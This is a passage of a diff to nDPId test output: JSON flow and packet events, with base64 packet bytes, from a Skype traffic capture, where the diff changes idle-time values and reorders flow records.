-00598{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969642336,"flow_last_seen":1431969661480,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969781311,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":50026,"dst_port":40002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969642336,"flow_last_seen":1431969661480,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969781311,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":50026,"dst_port":40002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3107,"source":"skype.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969783628,"flow_last_seen":1431969783628,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969783628,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50141,"dst_port":4415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3107,"source":"skype.pcap","alias":"nDPId-test","flow_id":286,"flow_packet_id":1,"flow_last_seen":1431969783628,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969783628,"pkt":"0NQSxnP1PBXCt3IOCABFAABAJsBAAEAG06bAqAEiUA4uecPdET\/5wLoiAAAAALAC\/\/9\/YwAAAgQFtAEDAwUBAQgKPiSwIwAAAAAEAgAA"} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3108,"source":"skype.pcap","alias":"nDPId-test","flow_id":286,"flow_packet_id":2,"flow_last_seen":1431969783723,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969783723,"pkt":"PBXCt3IO0NQSxnP1CABFAABAoepAAHQGJHxQDi55wKgBIhE\/w92tjxb3+cC6I7AS\/\/+oHwAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3109,"source":"skype.pcap","alias":"nDPId-test","flow_id":286,"flow_packet_id":3,"flow_last_seen":1431969783723,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969783723,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0sYlAAEAGSOnAqAEiUA4uecPdET\/5wLojrY8W+IAQECzqDwAAAQEICj4ksIIAAAAA"} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3119,"source":"skype.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969784741,"flow_last_seen":1431969784741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969784741,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50142,"dst_port":4415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3119,"source":"skype.pcap","alias":"nDPId-test","flow_id":287,"flow_packet_id":1,"flow_last_seen":1431969784741,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969784741,"pkt":"0NQSxnP1PBXCt3IOCABFAABAOglAAEAGwF3AqAEiUA4uecPeET+tjIdjAAAAALAC\/\/\/6AAAAAgQFtAEDAwUBAQgKPiS0eAAAAAAEAgAA"} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3120,"source":"skype.pcap","alias":"nDPId-test","flow_id":287,"flow_packet_id":2,"flow_last_seen":1431969784827,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969784827,"pkt":"PBXCt3IO0NQSxnP1CABFAABAogNAAHQGJGNQDi55wKgBIhE\/w94bo3ajrYyHZLAS\/\/9ZUgAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} 
-00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3121,"source":"skype.pcap","alias":"nDPId-test","flow_id":287,"flow_packet_id":3,"flow_last_seen":1431969784827,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969784827,"pkt":"0NQSxnP1PBXCt3IOCABFAAA03GtAAEAGHgfAqAEiUA4uecPeET+tjIdkG6N2pIAQECyW9gAAAQEICj4ktM4AAAAA"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3167,"source":"skype.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969788719,"flow_last_seen":1431969788719,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969788719,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"78.202.226.115","src_port":50143,"dst_port":29059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3167,"source":"skype.pcap","alias":"nDPId-test","flow_id":288,"flow_packet_id":1,"flow_last_seen":1431969788719,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969788719,"pkt":"0NQSxnP1PBXCt3IOCABFAABAtCpAAEAGk4XAqAEiTsric8PfcYPq0olRAAAAALAC\/\/+YTgAAAgQFtAEDAwUBAQgKPiTD+gAAAAAEAgAA"} 
-00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3171,"source":"skype.pcap","alias":"nDPId-test","flow_id":288,"flow_packet_id":2,"flow_last_seen":1431969788813,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969788813,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8euxAAHMGmcdOyuJzwKgBInGDw984j2+76tKJUqASIAAVbgAAAgQFrAEDAwgEAggKAlDJPj4kw\/o="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3172,"source":"skype.pcap","alias":"nDPId-test","flow_id":288,"flow_packet_id":3,"flow_last_seen":1431969788813,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969788813,"pkt":"0NQSxnP1PBXCt3IOCABFAAA00tZAAEAGdOXAqAEiTsric8PfcYPq0olSOI9vvIAQECxTqwAAAQEICj4kxFYCUMk+"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2921,"source":"skype.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969770694,"flow_last_seen":1431969770694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969770694,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":50135,"dst_port":20274,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2921,"source":"skype.pcap","alias":"nDPId-test","flow_id":280,"flow_packet_id":1,"flow_last_seen":1431969770694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969770694,"pkt":"0NQSxnP1PBXCt3IOCABFAABArS9AAEAG3hDAqAEiTKehBsPXTzInl3a\/AAAAALAC\/\/8aLgAAAgQFtAEDAwUBAQgKPiR90gAAAAAEAgAA"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2922,"source":"skype.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969770694,"flow_last_seen":1431969770694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969770694,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50136,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2922,"source":"skype.pcap","alias":"nDPId-test","flow_id":281,"flow_packet_id":1,"flow_last_seen":1431969770694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969770694,"pkt":"0NQSxnP1PBXCt3IOCABFAABALoZAAEAG+q7AqAEiR+4Hy8PYSU+K+FHXAAAAALAC\/\/9\/iwAAAgQFtAEDAwUBAQgKPiR90gAAAAAEAgAA"} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2923,"source":"skype.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969770694,"flow_last_seen":1431969770694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969770694,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50137,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2923,"source":"skype.pcap","alias":"nDPId-test","flow_id":282,"flow_packet_id":1,"flow_last_seen":1431969770694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969770694,"pkt":"0NQSxnP1PBXCt3IOCABFAABAQGxAAEAGd6zAqAEiBfi63cPZeSJOVOkRAAAAALAC\/\/+EAwAAAgQFtAEDAwUBAQgKPiR90wAAAAAEAgAA"} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2924,"source":"skype.pcap","alias":"nDPId-test","flow_id":282,"flow_packet_id":2,"flow_last_seen":1431969770813,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969770813,"pkt":"PBXCt3IO0NQSxnP1CABFAABA2Z5AAHIGrHkF+LrdwKgBInkiw9nUmdR+TlTpErASRBBRzQAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} 
+00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2925,"source":"skype.pcap","alias":"nDPId-test","flow_id":282,"flow_packet_id":3,"flow_last_seen":1431969770814,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969770814,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0mqxAAEAGHXjAqAEiBfi63cPZeSJOVOkS1JnUf4AQECwKBgAAAQEICj4kfkoAAAAA"} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2928,"source":"skype.pcap","alias":"nDPId-test","flow_id":281,"flow_packet_id":2,"flow_last_seen":1431969770913,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969770913,"pkt":"PBXCt3IO0NQSxnP1CABFAABAAItAAHMG9alH7gfLwKgBIklPw9gmoqm+ivhR2LAS\/\/9qHAAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2929,"source":"skype.pcap","alias":"nDPId-test","flow_id":281,"flow_packet_id":3,"flow_last_seen":1431969770913,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969770913,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0fUhAAEAGq\/jAqAEiR+4Hy8PYSU+K+FHYJqKpv4AQECzd4gAAAQEICj4kfqwAAAAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2934,"source":"skype.pcap","alias":"nDPId-test","flow_id":280,"flow_packet_id":2,"flow_last_seen":1431969770978,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969770978,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAAC4GnURMp6EGwKgBIk8yw9eajaZMJ5d2wKAScSAAYwAAAgQFrAQCCAq+obooPiR90gEDAwc="} 
+00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2935,"source":"skype.pcap","alias":"nDPId-test","flow_id":280,"flow_packet_id":3,"flow_last_seen":1431969770978,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969770978,"pkt":"0NQSxnP1PBXCt3IOCABFAAA05SBAAEAGpivAqAEiTKehBsPXTzInl3bAmo2mTYAQECyPAQAAAQEICj4kfuy+oboo"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2951,"source":"skype.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969771806,"flow_last_seen":1431969771806,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969771806,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50138,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2951,"source":"skype.pcap","alias":"nDPId-test","flow_id":283,"flow_packet_id":1,"flow_last_seen":1431969771806,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969771806,"pkt":"0NQSxnP1PBXCt3IOCABFAABAXBhAAEAGzRzAqAEiR+4Hy8PaSU8uFQxlAAAAALAC\/\/8djQAAAgQFtAEDAwUBAQgKPiSCJAAAAAAEAgAA"} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2952,"source":"skype.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969771806,"flow_last_seen":1431969771806,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969771806,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50139,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2952,"source":"skype.pcap","alias":"nDPId-test","flow_id":284,"flow_packet_id":1,"flow_last_seen":1431969771806,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969771806,"pkt":"0NQSxnP1PBXCt3IOCABFAABAZhxAAEAGUfzAqAEiBfi63cPbeSJooXaIAAAAALAC\/\/\/X7AAAAgQFtAEDAwUBAQgKPiSCJAAAAAAEAgAA"} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2953,"source":"skype.pcap","alias":"nDPId-test","flow_id":284,"flow_packet_id":2,"flow_last_seen":1431969771918,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969771918,"pkt":"PBXCt3IO0NQSxnP1CABFAABA2bNAAHIGrGQF+LrdwKgBInkiw9s0p7etaKF2ibASRBBmywAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} 
+00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2954,"source":"skype.pcap","alias":"nDPId-test","flow_id":284,"flow_packet_id":3,"flow_last_seen":1431969771919,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969771919,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0HKZAAEAGm37AqAEiBfi63cPbeSJooXaJNKe3roAQECwaugAAAQEICj4kgpQAAAAA"} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2956,"source":"skype.pcap","alias":"nDPId-test","flow_id":283,"flow_packet_id":2,"flow_last_seen":1431969772021,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969772021,"pkt":"PBXCt3IO0NQSxnP1CABFAABAALFAAHMG9YNH7gfLwKgBIklPw9pIXx9TLhUMZrAS\/\/91HgAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2957,"source":"skype.pcap","alias":"nDPId-test","flow_id":283,"flow_packet_id":3,"flow_last_seen":1431969772021,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969772021,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0TOFAAEAG3F\/AqAEiR+4Hy8PaSU8uFQxmSF8fVIAQECzklgAAAQEICj4kgvoAAAAA"} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3013,"source":"skype.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969774806,"flow_last_seen":1431969774806,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969774806,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":50140,"dst_port":20274,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3013,"source":"skype.pcap","alias":"nDPId-test","flow_id":285,"flow_packet_id":1,"flow_last_seen":1431969774806,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969774806,"pkt":"0NQSxnP1PBXCt3IOCABFAABAwnFAAEAGyM7AqAEiTKehBsPcTzIA95PqAAAAALAC\/\/8TqQAAAgQFtAEDAwUBAQgKPiSNxwAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3061,"source":"skype.pcap","alias":"nDPId-test","flow_id":285,"flow_packet_id":2,"flow_last_seen":1431969776480,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969776480,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAAC4GnURMp6EGwKgBIk8yw9wNTHkCAPeT66AScSCe6QAAAgQFrAQCCAq+oc+oPiSNxwEDAwc="} 
+00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3062,"source":"skype.pcap","alias":"nDPId-test","flow_id":285,"flow_packet_id":3,"flow_last_seen":1431969776480,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969776480,"pkt":"0NQSxnP1PBXCt3IOCABFAAAo01NAAEAGuATAqAEiTKehBsPcTzIA95PrAAAAAFAEAABYdwAA"} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3107,"source":"skype.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969783628,"flow_last_seen":1431969783628,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969783628,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50141,"dst_port":4415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3107,"source":"skype.pcap","alias":"nDPId-test","flow_id":286,"flow_packet_id":1,"flow_last_seen":1431969783628,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969783628,"pkt":"0NQSxnP1PBXCt3IOCABFAABAJsBAAEAG06bAqAEiUA4uecPdET\/5wLoiAAAAALAC\/\/9\/YwAAAgQFtAEDAwUBAQgKPiSwIwAAAAAEAgAA"} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3108,"source":"skype.pcap","alias":"nDPId-test","flow_id":286,"flow_packet_id":2,"flow_last_seen":1431969783723,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969783723,"pkt":"PBXCt3IO0NQSxnP1CABFAABAoepAAHQGJHxQDi55wKgBIhE\/w92tjxb3+cC6I7AS\/\/+oHwAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3109,"source":"skype.pcap","alias":"nDPId-test","flow_id":286,"flow_packet_id":3,"flow_last_seen":1431969783723,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969783723,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0sYlAAEAGSOnAqAEiUA4uecPdET\/5wLojrY8W+IAQECzqDwAAAQEICj4ksIIAAAAA"} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3119,"source":"skype.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969784741,"flow_last_seen":1431969784741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969784741,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50142,"dst_port":4415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3119,"source":"skype.pcap","alias":"nDPId-test","flow_id":287,"flow_packet_id":1,"flow_last_seen":1431969784741,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969784741,"pkt":"0NQSxnP1PBXCt3IOCABFAABAOglAAEAGwF3AqAEiUA4uecPeET+tjIdjAAAAALAC\/\/\/6AAAAAgQFtAEDAwUBAQgKPiS0eAAAAAAEAgAA"} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3120,"source":"skype.pcap","alias":"nDPId-test","flow_id":287,"flow_packet_id":2,"flow_last_seen":1431969784827,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969784827,"pkt":"PBXCt3IO0NQSxnP1CABFAABAogNAAHQGJGNQDi55wKgBIhE\/w94bo3ajrYyHZLAS\/\/9ZUgAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3121,"source":"skype.pcap","alias":"nDPId-test","flow_id":287,"flow_packet_id":3,"flow_last_seen":1431969784827,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969784827,"pkt":"0NQSxnP1PBXCt3IOCABFAAA03GtAAEAGHgfAqAEiUA4uecPeET+tjIdkG6N2pIAQECyW9gAAAQEICj4ktM4AAAAA"} 
+00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3167,"source":"skype.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969788719,"flow_last_seen":1431969788719,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969788719,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"78.202.226.115","src_port":50143,"dst_port":29059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3167,"source":"skype.pcap","alias":"nDPId-test","flow_id":288,"flow_packet_id":1,"flow_last_seen":1431969788719,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969788719,"pkt":"0NQSxnP1PBXCt3IOCABFAABAtCpAAEAGk4XAqAEiTsric8PfcYPq0olRAAAAALAC\/\/+YTgAAAgQFtAEDAwUBAQgKPiTD+gAAAAAEAgAA"} 